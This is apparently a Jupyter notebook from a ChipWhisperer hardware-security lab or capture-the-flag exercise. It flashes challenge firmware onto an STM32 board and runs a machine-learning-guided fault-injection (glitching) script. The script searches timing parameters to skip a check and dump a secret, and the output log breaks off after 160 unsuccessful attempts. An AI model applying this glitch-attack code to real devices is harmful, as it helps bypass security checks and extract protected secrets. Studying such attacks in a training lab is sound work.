## Critical Caluclation

In [17]:
SCOPETYPE = 'CWNANO'
PLATFORM = 'CWNANO'

In [18]:
%run "../setup/Setup_Generic.ipynb"

(ChipWhisperer NAEUSB WARNING|File naeusb.py:826) Your firmware (0.65.0) is outdated - latest is 0.66.0 See https://chipwhisperer.readthedocs.io/en/latest/firmware.html for more information


INFO: Caught exception on reconnecting to target - attempting to reconnect to scope first.
INFO: This is a work-around when USB has died without Python knowing. Ignore errors above this line.
INFO: Found ChipWhisperer😍


In [19]:
fw_path = "criticalCalculation-{}.hex".format(PLATFORM)
cw.program_target(scope, prog, fw_path)

Detected known STMF32: STM32F04xxx
Extended erase (0x44), this can take ten seconds or more
Attempting to program 5763 bytes at 0x8000000
STM32F Programming flash...
STM32F Reading flash...
Verified flash OK, 5763 bytes


In [20]:
import time
import random
import numpy as np
from sklearn.neural_network import MLPClassifier
import chipwhisperer as cw


########################################
# tunable config
########################################

OFFSET_MIN = 1400
OFFSET_MAX = 1800

REPEAT_MIN = 9
REPEAT_MAX = 12

TOTAL_ATTEMPTS = 2000

# how often we retrain the ML model
RETRAIN_EVERY = 20

# after this many samples we start using the model to guide search
WARMUP_SAMPLES = 30

# exploration probability (force some random tries so we don't get stuck)
EPSILON = 0.15


########################################
# ChipWhisperer setup
########################################

scope = cw.scope()
target = cw.target(scope, cw.targets.SimpleSerial)
scope.default_setup()

def reset_target():
    # standard NRST pulse to bring target back to known state
    scope.io.nrst = 'low'
    time.sleep(0.003)
    scope.io.nrst = 'high_z'
    time.sleep(0.003)


########################################
# Glitch ML helper
########################################

class AdaptiveGlitcher:
    """
    Keeps a dataset of (offset, repeat) -> success label
    Trains a small NN classifier to model P(success | params)
    Uses that model to bias future parameter choices.
    """
    def __init__(self):
        self.X = []   # [[offset, repeat], ...]
        self.y = []   # [0/1, ...]
        self.model = None
        self.trained = False

    def record_result(self, offset, repeat, success):
        self.X.append([offset, repeat])
        self.y.append(1 if success else 0)

    def maybe_retrain(self):
        # only retrain if we have enough samples
        if len(self.X) < 5:
            return

        # train a tiny MLP to approximate success region
        X_arr = np.array(self.X, dtype=np.float32)
        y_arr = np.array(self.y, dtype=np.int32)

        # it's small so just retrain from scratch each time
        clf = MLPClassifier(
            hidden_layer_sizes=(16, 16),
            activation='relu',
            max_iter=500,
            random_state=1337
        )

        # If all labels so far are the same (all 0 or all 1),
        # sklearn will complain. We'll just skip in that case.
        if len(np.unique(y_arr)) < 2:
            return

        clf.fit(X_arr, y_arr)
        self.model = clf
        self.trained = True

    def choose_params(self):
        """
        Strategy:
        - If not enough data yet (cold start), or model not ready -> random explore
        - Otherwise:
          * With probability EPSILON -> explore random
          * Else -> sample candidate points, score with model, pick weighted by score
        """
        # cold start
        if (not self.trained) or (len(self.X) < WARMUP_SAMPLES):
            return self._random_params()

        # epsilon exploration
        if random.random() < EPSILON:
            return self._random_params()

        # exploitation: propose a bunch of candidates and rank them
        candidates = [
            (
                random.randint(OFFSET_MIN, OFFSET_MAX),
                random.randint(REPEAT_MIN, REPEAT_MAX)
            )
            for _ in range(200)
        ]

        X_test = np.array(candidates, dtype=np.float32)
        # predict_proba returns [[p0, p1], ...], we want p1 (success prob)
        probs = self.model.predict_proba(X_test)[:, 1]

        # Sometimes probs can all be ~0 early on. If sum == 0, just pick max.
        s = probs.sum()
        if s <= 0:
            best_idx = int(np.argmax(probs))
            return candidates[best_idx]

        # Weighted random choice biased to high-prob zones
        probs = probs / s
        idx = np.random.choice(len(candidates), p=probs)
        return candidates[idx]

    @staticmethod
    def _random_params():
        off = random.randint(OFFSET_MIN, OFFSET_MAX)
        rep = random.randint(REPEAT_MIN, REPEAT_MAX)
        return off, rep


########################################
# Helper: run one glitch attempt
########################################

def run_single_glitch(offset, repeat):
    """
    Applies glitch params, arms the scope, triggers target,
    captures response, and returns:
        success_bool, response_text

    success_bool = True means "this looks interesting / faulted",
    NOT "we definitely have final flag".
    """
    scope.glitch.ext_offset = offset
    scope.glitch.repeat = repeat

    # Arm scope & trigger target command
    scope.arm()
    target.simpleserial_write("d", b"")  # send command to device
    scope.capture()

    # Read back up to 26 bytes from the 'r' identifier
    resp = target.simpleserial_read_witherrors("r", 26)

    if resp and isinstance(resp, dict):
        payload = resp.get("payload")
        if payload:
            text = payload.decode("ascii", errors="ignore").strip()

            # Success condition heuristic:
            # - we do NOT want the normal "DIAGNOSTIC_OK"
            # - we want something that looks like output, not empty
            # - usually flags / secrets are longer than a short OK
            interesting = (
                len(text) > 5 and
                "DIAGNOSTIC_OK" not in text
            )

            return interesting, text

    # No / boring response
    return False, ""

########################################
# Main loop
########################################

def main():
    glitcher = AdaptiveGlitcher()

    try:
        for attempt in range(TOTAL_ATTEMPTS):
            # pick glitch params from adaptive chooser
            offset, repeat = glitcher.choose_params()

            # run the glitch attempt
            success, text = run_single_glitch(offset, repeat)

            # log to dataset
            glitcher.record_result(offset, repeat, success)

            # retrain the ML model occasionally
            if attempt % RETRAIN_EVERY == 0:
                glitcher.maybe_retrain()

            # status output
            if attempt % 10 == 0:
                print(
                    f"[{attempt}/{TOTAL_ATTEMPTS}] "
                    f"offset={offset} repeat={repeat} "
                    f"success={success} text='{text[:30]}'",
                    flush=True
                )

            # if we think we actually glitched past the check and got juicy data:
            if success:
                print("\n=== POTENTIAL HIT ===")
                print(f"Attempt: {attempt}")
                print(f"Glitch parameters: offset={offset}, repeat={repeat}")
                print(f"Device response: {text}")
                print("=====================\n")
                # break because you probably got the flag / secret
                break

            # reset target for next try
            reset_target()

    finally:
        # always clean up hardware handles
        scope.dis()
        target.dis()


if __name__ == "__main__":
    main()


(ChipWhisperer NAEUSB WARNING|File naeusb.py:826) Your firmware (0.65.0) is outdated - latest is 0.66.0 See https://chipwhisperer.readthedocs.io/en/latest/firmware.html for more information


[0/2000] offset=1717 repeat=12 success=False text=''
[10/2000] offset=1734 repeat=12 success=False text=''
[20/2000] offset=1628 repeat=10 success=False text='DIAGNOSTIC_OK'
[30/2000] offset=1576 repeat=9 success=False text='DIAGNOSTIC_OK'
[40/2000] offset=1603 repeat=12 success=False text=''
[50/2000] offset=1625 repeat=12 success=False text=''
[60/2000] offset=1408 repeat=11 success=False text='DIAGNOSTIC_OK'
[70/2000] offset=1470 repeat=9 success=False text='DIAGNOSTIC_OK'
[80/2000] offset=1657 repeat=11 success=False text='DIAGNOSTIC_OK'
[90/2000] offset=1549 repeat=11 success=False text='DIAGNOSTIC_OK'
[100/2000] offset=1462 repeat=11 success=False text='DIAGNOSTIC_OK'
[110/2000] offset=1743 repeat=10 success=False text='DIAGNOSTIC_OK'
[120/2000] offset=1670 repeat=12 success=False text=''
[130/2000] offset=1726 repeat=9 success=False text='DIAGNOSTIC_OK'
[140/2000] offset=1483 repeat=11 success=False text=''
[150/2000] offset=1592 repeat=12 success=False text='DIAGNOSTIC_OK'
[160